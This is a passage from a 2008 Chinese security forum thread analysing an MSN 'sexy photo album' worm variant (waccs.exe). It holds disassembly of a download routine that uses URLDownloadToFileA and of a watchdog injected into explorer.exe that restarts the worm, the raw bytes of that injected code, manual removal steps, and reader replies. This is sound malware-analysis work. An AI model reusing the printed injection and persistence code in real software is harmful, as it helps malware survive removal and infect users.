F4E6FFFF LEA ECX,DWORD PTR SS:[EBP-190C] 00404E8E E8 36030000 CALL waccs.004051C9 00404E93 83BD F8E6FFFF 0>CMP DWORD PTR SS:[EBP-1908],0 00404E9A 74 38 JE SHORT waccs.00404ED4 00404E9C 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC] 00404EA2 8020 00 AND BYTE PTR DS:[EAX],0 00404EA5 8B85 18E7FFFF MOV EAX,DWORD PTR SS:[EBP-18E8] 00404EAB 8B8D 60EDFFFF MOV ECX,DWORD PTR SS:[EBP-12A0] 00404EB1 898C85 68EEFFFF MOV DWORD PTR SS:[EBP+EAX4-1198],ECX 00404EB8 8B85 34E8FFFF MOV EAX,DWORD PTR SS:[EBP-17CC] 00404EBE 40 INC EAX 00404EBF 8985 60EDFFFF MOV DWORD PTR SS:[EBP-12A0],EAX 00404EC5 8B85 18E7FFFF MOV EAX,DWORD PTR SS:[EBP-18E8] 00404ECB 40 INC EAX 00404ECC 8985 18E7FFFF MOV DWORD PTR SS:[EBP-18E8],EAX 00404ED2 ^ EB 84 JMP SHORT waccs.00404E58 00404ED4 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404EDA 50 PUSH EAX 00404EDB 68 04010000 PUSH 104 00404EE0 FF15 A4804000 CALL DWORD PTR DS:[4080A4] ; kernel32.GetTempPathA 00404EE6 8D85 45EAFFFF LEA EAX,DWORD PTR SS:[EBP-15BB] 00404EEC 50 PUSH EAX 00404EED 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404EF3 50 PUSH EAX 00404EF4 68 23B863A8 PUSH A863B823 00404EF9 8D8D ECE6FFFF LEA ECX,DWORD PTR SS:[EBP-1914] 00404EFF E8 35040000 CALL waccs.00405339 00404F04 50 PUSH EAX 00404F05 68 04010000 PUSH 104 00404F0A 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404F10 50 PUSH EAX 00404F11 E8 2A210000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf 00404F16 83C4 14 ADD ESP,14 00404F19 8D8D ECE6FFFF LEA ECX,DWORD PTR SS:[EBP-1914] 00404F1F E8 02D1FFFF CALL waccs.00402026 00404F24 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404F2A 50 PUSH EAX 00404F2B E8 BFF0FFFF CALL waccs.00403FEF 00404F30 59 POP ECX 00404F31 0FB6C0 MOVZX EAX,AL 00404F34 85C0 TEST EAX,EAX 00404F36 74 0D JE SHORT waccs.00404F45 00404F38 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404F3E 50 PUSH EAX 00404F3F FF15 E8804000 CALL DWORD PTR DS:[4080E8] ; kernel32.DeleteFileA 00404F45 0FBE85 3DE8FFFF MOVSX EAX,BYTE PTR SS:[EBP-17C3] 00404F4C 85C0 TEST EAX,EAX 00404F4E 0F84 B5000000 JE waccs.00405009 00404F54 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00404F5A 50 PUSH EAX 00404F5B E8 EC200000 CALL waccs.0040704C ; JMP 到 msvcrt.srand 00404F60 59 POP ECX 00404F61 E8 E0200000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00404F66 99 CDQ 00404F67 6A 09 PUSH 9 00404F69 59 POP ECX 00404F6A F7F9 IDIV ECX 00404F6C 52 PUSH EDX 00404F6D E8 D4200000 CALL waccs.00407046 ; JMP 到 msvcrt.rand 00404F72 99 CDQ 00404F73 6A 09 PUSH 9 00404F75 59 POP ECX 00404F76 F7F9 IDIV ECX 00404F78 52 PUSH EDX 00404F79 8D85 5CECFFFF LEA EAX,DWORD PTR SS:[EBP-13A4] 00404F7F 50 PUSH EAX 00404F80 68 EADFCD01 PUSH 1CDDFEA 00404F85 8D8D E0E6FFFF LEA ECX,DWORD PTR SS:[EBP-1920] 00404F8B E8 09040000 CALL waccs.00405399 00404F90 50 PUSH EAX 00404F91 68 04010000 PUSH 104 00404F96 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404F9C 50 PUSH EAX 00404F9D E8 9E200000 CALL waccs.00407040 ; JMP 到 msvcrt._snprintf 00404FA2 83C4 18 ADD ESP,18 00404FA5 8D8D E0E6FFFF LEA ECX,DWORD PTR SS:[EBP-1920] 00404FAB E8 C6D0FFFF CALL waccs.00402076 00404FB0 6A 00 PUSH 0 00404FB2 6A 00 PUSH 0 00404FB4 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404FBA 50 PUSH EAX 00404FBB 8D85 3DE8FFFF LEA EAX,DWORD PTR SS:[EBP-17C3] 00404FC1 50 PUSH EAX 00404FC2 6A 00 PUSH 0 00404FC4 E8 EB210000 CALL waccs.004071B4 ; JMP 到 urlmon.URLDownloadToFileA 00404FC9 8985 24E8FFFF MOV DWORD PTR SS:[EBP-17DC],EAX 00404FCF 83BD 24E8FFFF 0>CMP DWORD PTR SS:[EBP-17DC],0 00404FD6 74 05 JE SHORT waccs.00404FDD 00404FD8 E8 CB200000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00404FDD 8D85 41E9FFFF LEA EAX,DWORD PTR SS:[EBP-16BF] 00404FE3 50 PUSH EAX 00404FE4 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00404FEA 50 PUSH EAX 00404FEB 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00404FF1 50 PUSH EAX 00404FF2 E8 181B0000 CALL waccs.00406B0F 00404FF7 83C4 0C ADD ESP,0C 00404FFA 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00405000 50 PUSH EAX 00405001 FF15 E8804000 CALL DWORD PTR DS:[4080E8] ; kernel32.DeleteFileA 00405007 EB 38 JMP SHORT waccs.00405041 00405009 68 04010000 PUSH 104 0040500E 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00405014 50 PUSH EAX 00405015 6A 00 PUSH 0 00405017 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA 0040501D 50 PUSH EAX 0040501E FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA 00405024 8D85 41E9FFFF LEA EAX,DWORD PTR SS:[EBP-16BF] 0040502A 50 PUSH EAX 0040502B 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00405031 50 PUSH EAX 00405032 8D85 64EDFFFF LEA EAX,DWORD PTR SS:[EBP-129C] 00405038 50 PUSH EAX 00405039 E8 D11A0000 CALL waccs.00406B0F 0040503E 83C4 0C ADD ESP,0C 00405041 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00405047 50 PUSH EAX 00405048 E8 A2EFFFFF CALL waccs.00403FEF 0040504D 59 POP ECX 0040504E 0FB6C0 MOVZX EAX,AL 00405051 85C0 TEST EAX,EAX 00405053 75 05 JNZ SHORT waccs.0040505A 00405055 E8 4E200000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 0040505A FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 00405060 8985 38E8FFFF MOV DWORD PTR SS:[EBP-17C8],EAX 00405066 8B85 50ECFFFF MOV EAX,DWORD PTR SS:[EBP-13B0] 0040506C 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 0040506F EB 07 JMP SHORT waccs.00405078 00405071 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 00405074 48 DEC EAX 00405075 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 00405078 837D FC 00 CMP DWORD PTR SS:[EBP-4],0 0040507C 7E 38 JLE SHORT waccs.004050B6 0040507E FFB5 18E7FFFF PUSH DWORD PTR SS:[EBP-18E8] 00405084 8D85 68EEFFFF LEA EAX,DWORD PTR SS:[EBP-1198] 0040508A 50 PUSH EAX 0040508B 8D85 1CE7FFFF LEA EAX,DWORD PTR SS:[EBP-18E4] 00405091 50 PUSH EAX 00405092 FFB5 58ECFFFF PUSH DWORD PTR SS:[EBP-13A8] 00405098 E8 ECF8FFFF CALL waccs.00404989 0040509D 83C4 10 ADD ESP,10 004050A0 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 004050A3 48 DEC EAX 004050A4 85C0 TEST EAX,EAX 004050A6 7E 0C JLE SHORT waccs.004050B4 004050A8 FFB5 54ECFFFF PUSH DWORD PTR SS:[EBP-13AC] 004050AE FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep 004050B4 ^ EB BB JMP SHORT waccs.00405071 004050B6 FF15 68804000 CALL DWORD PTR DS:[408068] ; kernel32.GetTickCount 004050BC 8985 2CE8FFFF MOV DWORD PTR SS:[EBP-17D4],EAX 004050C2 8B85 2CE8FFFF MOV EAX,DWORD PTR SS:[EBP-17D4] 004050C8 2B85 38E8FFFF SUB EAX,DWORD PTR SS:[EBP-17C8] 004050CE 99 CDQ 004050CF B9 60EA0000 MOV ECX,0EA60 004050D4 F7F9 IDIV ECX 004050D6 50 PUSH EAX 004050D7 FFB5 50ECFFFF PUSH DWORD PTR SS:[EBP-13B0] 004050DD 68 449F4000 PUSH waccs.00409F44 004050E2 68 489F4000 PUSH waccs.00409F48 004050E7 8B85 58ECFFFF MOV EAX,DWORD PTR SS:[EBP-13A8] 004050ED 05 D3000000 ADD EAX,0D3 004050F2 50 PUSH EAX 004050F3 68 26E784BB PUSH BB84E726 004050F8 8D8D A4E6FFFF LEA ECX,DWORD PTR SS:[EBP-195C] 004050FE E8 F6020000 CALL waccs.004053F9 00405103 50 PUSH EAX 00405104 FFB5 58ECFFFF PUSH DWORD PTR SS:[EBP-13A8] 0040510A E8 F1BEFFFF CALL waccs.00401000 0040510F 83C4 1C ADD ESP,1C 00405112 8D8D A4E6FFFF LEA ECX,DWORD PTR SS:[EBP-195C] 00405118 E8 D4000000 CALL waccs.004051F1 0040511D E8 861F0000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00405122 5F POP EDI 00405123 5E POP ESI 00405124 C9 LEAVE 00405125 C3 RETN ; 返回. ---------------------------------------------------------- ---------------------------------------------------------------------------------------------------- ---------------------------------------------------------- 3、对病毒注入到系统桌面程序“explorer.exe”进程中的恶意代码进行分析：注入的代码段： [进程守护功能：循环执行检测代码，根据互斥体名称判断病毒主程序是否在运行，如果发现病毒主程序互斥体名称不存在(进程被关闭)，则马上重新调用病毒程序启动运行.] 01A50000 55 PUSH EBP ; 注入代码的入口. 01A50001 8BEC MOV EBP,ESP 01A50003 83EC 08 SUB ESP,8 01A50006 6A 00 PUSH 0 ; /hTemplateFile = NULL 01A50008 68 80000000 PUSH 80 ; \|Attributes = NORMAL 01A5000D 6A 03 PUSH 3 ; \|Mode = OPEN_EXISTING 01A5000F 6A 00 PUSH 0 ; \|pSecurity = NULL 01A50011 6A 01 PUSH 1 ; \|ShareMode = FILE_SHARE_READ 01A50013 68 00000080 PUSH 80000000 ; \|Access = GENERIC_READ 01A50018 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A5001B 83C0 1C ADD EAX,1C 01A5001E 50 PUSH EAX ; ASCII "C:\WINDOWS\system32\waccs.exe" 01A5001F 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 01A50022 FF51 04 CALL DWORD PTR DS:[ECX+4] ; kernel32.CreateFileA(以共享读的方式打开病毒主程序文件，防止被用户或安全软件删除). 01A50025 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 01A50028 BA 01000000 MOV EDX,1 01A5002D 85D2 TEST EDX,EDX ; 判断函数返回值. 01A5002F 74 72 JE SHORT 01A500A3 ; 如果文件不存在，则跳出. 01A50031 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A50034 05 20010000 ADD EAX,120 01A50039 50 PUSH EAX ; /MutexName = "t3x0" 01A5003A 6A 00 PUSH 0 ; \|InitialOwner = FALSE 01A5003C 6A 00 PUSH 0 ; \|pSecurity = NULL 01A5003E 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 01A50041 FF51 08 CALL DWORD PTR DS:[ECX+8] ; kernel32.CreateMutexA 01A50044 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 01A50047 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 01A5004A FF52 0C CALL DWORD PTR DS:[EDX+C] ; ntdll.RtlGetLastWin32Error 01A5004D 3D B7000000 CMP EAX,0B7 01A50052 74 2F JE SHORT 01A50083 ; 判断病毒进程是否在还运行. 01A50054 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] ; 如果发现病毒进程不存在了，就从这里开始执行. 01A50057 50 PUSH EAX 01A50058 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 019B005B FF11 CALL DWORD PTR DS:[ECX] ; kernel32.CloseHandle(关闭句柄). 01A5005D 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4] 01A50060 52 PUSH EDX 01A50061 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 019B0064 FF50 10 CALL DWORD PTR DS:[EAX+10] ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体). 01A50067 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 01A5006A 51 PUSH ECX 01A5006B 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 019B006E FF12 CALL DWORD PTR DS:[EDX] ; kernel32.CloseHandle(关闭句柄). 01A50070 6A 00 PUSH 0 01A50072 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A50075 83C0 1C ADD EAX,1C 01A50078 50 PUSH EAX ; ASCII "C:\WINDOWS\system32\waccs.exe" 01A50079 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 019B007C FF51 18 CALL DWORD PTR DS:[ECX+18] ; kernel32.WinExec(重新调用病毒程序启动运行). 01A5007F 33C0 XOR EAX,EAX 01A50081 EB 22 JMP SHORT 01A500A5 ; 跳出循环. 01A50083 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4] 01A50086 52 PUSH EDX 01A50087 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 01A5008A FF50 10 CALL DWORD PTR DS:[EAX+10] ; kernel32.ReleaseMutex(释放由线程拥有的一个互斥体). 01A5008D 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 01A50090 51 PUSH ECX 01A50091 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] 01690094 FF12 CALL DWORD PTR DS:[EDX] ; kernel32.CloseHandle(关闭句柄). 01A50096 68 10270000 PUSH 2710 01A5009B 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0169009E FF50 14 CALL DWORD PTR DS:[EAX+14] ; kernel32.Sleep(等待). 01A500A1 ^ EB 85 JMP SHORT 01A50028 ; 循环执行这段检测代码. 01A500A3 33C0 XOR EAX,EAX 01A500A5 8BE5 MOV ESP,EBP 01A500A7 5D POP EBP 01A500A8 C2 0400 RETN 4 ; 返回(退出). 注入的数据段： 0012F550 47 9B 80 7C 24 1A 80 7C G泙\|$€\| 0012F558 3F E9 80 7C 31 03 93 7C ?閫\|1搢 0012F560 A7 24 80 7C 42 24 80 7C ?€\|B$€\| 0012F568 6D 13 86 7C 43 3A 5C 57 m唡C:\W 0012F570 49 4E 44 4F 57 53 5C 73 INDOWS\s 0012F578 79 73 74 65 6D 33 32 5C ystem32\ 0012F580 77 61 63 63 73 2E 65 78 waccs.ex 0012F588 65 00 00 00 00 00 00 00 e....... 0012F590 00 00 00 00 00 00 00 00 ........ 0012F598 00 00 00 00 00 00 00 00 ........ 0012F5A0 00 00 00 00 00 00 00 00 ........ 0012F5A8 00 00 00 00 00 00 00 00 ........ 0012F5B0 00 00 00 00 00 00 00 00 ........ 0012F5B8 00 00 00 00 00 00 00 00 ........ 0012F5C0 00 00 00 00 00 00 00 00 ........ 0012F5C8 00 00 00 00 00 00 00 00 ........ 0012F5D0 00 00 00 00 00 00 00 00 ........ 0012F5D8 00 00 00 00 00 00 00 00 ........ 0012F5E0 00 00 00 00 00 00 00 00 ........ 0012F5E8 00 00 00 00 00 00 00 00 ........ 0012F5F0 00 00 00 00 00 00 00 00 ........ 0012F5F8 00 00 00 00 00 00 00 00 ........ 0012F600 00 00 00 00 00 00 00 00 ........ 0012F608 00 00 00 00 00 00 00 00 ........ 0012F610 00 00 00 00 00 00 00 00 ........ 0012F618 00 00 00 00 00 00 00 00 ........ 0012F620 00 00 00 00 00 00 00 00 ........ 0012F628 00 00 00 00 00 00 00 00 ........ 0012F630 00 00 00 00 00 00 00 00 ........ 0012F638 00 00 00 00 00 00 00 00 ........ 0012F640 00 00 00 00 00 00 00 00 ........ 0012F648 00 00 00 00 00 00 00 00 ........ 0012F650 00 00 00 00 00 00 00 00 ........ 0012F658 00 00 00 00 00 00 00 00 ........ 0012F660 00 00 00 00 00 00 00 00 ........ 0012F668 00 00 00 00 00 00 00 00 ........ 0012F670 74 33 78 30 00 00 00 00 t3x0.... 0012F678 00 00 00 00 00 00 00 00 ........ 0012F680 00 00 00 00 00 00 00 00 ........ 0012F688 00 00 00 00 00 00 00 00 ........ 0012F690 00 00 00 00 00 00 00 00 ........ 0012F698 00 00 00 00 00 00 00 00 ........ 0012F6A0 00 00 00 00 00 00 00 00 ........ 0012F6A8 00 00 00 00 00 00 00 00 ........ 0012F6B0 00 . ---------------------------------------------------------- 注入的数据段： 47 9B 80 7C 24 1A 80 7C 3F E9 80 7C 31 03 93 7C A7 24 80 7C 42 24 80 7C 6D 13 86 7C 43 3A 5C 57 49 4E 44 4F 57 53 5C 73 79 73 74 65 6D 33 32 5C 77 61 63 63 73 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 33 78 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 注入的代码段： 55 8B EC 83 EC 08 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 45 08 83 C0 1C 50 8B 4D 08 FF 51 04 89 45 F8 BA 01 00 00 00 85 D2 74 72 8B 45 08 05 20 01 00 00 50 6A 00 6A 00 8B 4D 08 FF 51 08 89 45 FC 8B 55 08 FF 52 0C 3D B7 00 00 00 74 2F 8B 45 F8 50 8B 4D 08 FF 11 8B 55 FC 52 8B 45 08 FF 50 10 8B 4D FC 51 8B 55 08 FF 12 6A 00 8B 45 08 83 C0 1C 50 8B 4D 08 FF 51 18 33 C0 EB 22 8B 55 FC 52 8B 45 08 FF 50 10 8B 4D FC 51 8B 55 08 FF 12 68 10 27 00 00 8B 45 08 FF 50 14 EB 85 33 C0 8B E5 5D C2 04 00 55 ---------------------------------------------------------- ---------------------------------------------------------------------------------------------------- ************************************************************************************************** 三、手动杀毒方法步骤(在系统真实环境下测试有效)： 1：终止关闭掉病毒保护进程“explorer.exe”(系统桌面程序)。 2：结束掉病毒进程“C:\windows\system32\waccs.exe”。 3：删除掉病毒程序文件“C:\windows\system32\waccs.exe”。 4：重新启动运行系统桌面程序“C:\windows\explorer.exe”，查杀病毒完毕。 ************************************************************************************************** //////////////////////////////////////////////////////////////////////////////////////////////////// 2008-6-13 21:43 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 3 楼上传个“蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)”文本文档，方便下载。由于时间紧，只是大概分析了下，难免有错误的地方，请指正，谢谢！上传的附件： ReadMe.rar （36.09kb，21次下载） 2008-6-13 22:36 0
frozenrain 雪币： 107 活跃值： (1693) 能力值： ( LV6，RANK：80 ) 在线值：发帖 26 回帖 509 粉丝 1 关注私信	frozenrain 4 楼病毒分析的要加精哈 2008-6-13 22:48 0
qy黄文超雪币： 209 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 33 回帖 155 粉丝 0 关注私信	qy黄文超 5 楼太棒了！！！希望楼主把样本传上来！！ 2008-6-13 22:48 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 56 关注私信	combojiang 26 6 楼呵呵，好长的文章啊，辛苦了。 2008-6-13 22:52 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 7 楼您好啊，呵呵。居然还去了偶的博客留言，谢谢关注，呵呵。这么晚还没休息？ 2008-6-13 23:03 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 8 楼我也喜欢“加精”，呵呵。谢谢支持。 2008-6-13 23:06 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 9 楼好的。但得先请示下坛主或他们，他们同意上穿病毒我再传，不然不太好。 2008-6-13 23:09 0
jskew 雪币： 124 活跃值： (70) 能力值： ( LV4，RANK：50 ) 在线值：发帖 30 回帖 352 粉丝 0 关注私信	jskew 1 10 楼需要样本 2008-6-13 23:41 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 11 楼慢慢顶，呵呵。斑竹说同意，我就发。 2008-6-14 00:00 0
lonkil 雪币： 244 活跃值： (69) 能力值： ( LV4，RANK：50 ) 在线值：发帖 5 回帖 113 粉丝 0 关注私信	lonkil 1 12 楼兄弟，果然强悍，学习了。 2008-6-14 01:06 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 13 楼太长不利于阅读,其实你贴这么多汇编代码...谁会去看...? 还不如自己去分析了.. 2008-6-14 01:08 0
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 14 楼是啊，我写着也很累的，呵呵！不过，既然都大概标注了，所以就都发上来了。。。。。 2008-6-14 09:23 0
七号雪币： 199 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 89 粉丝 0 关注私信	七号 15 楼强悍。。。。 2008-6-14 10:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复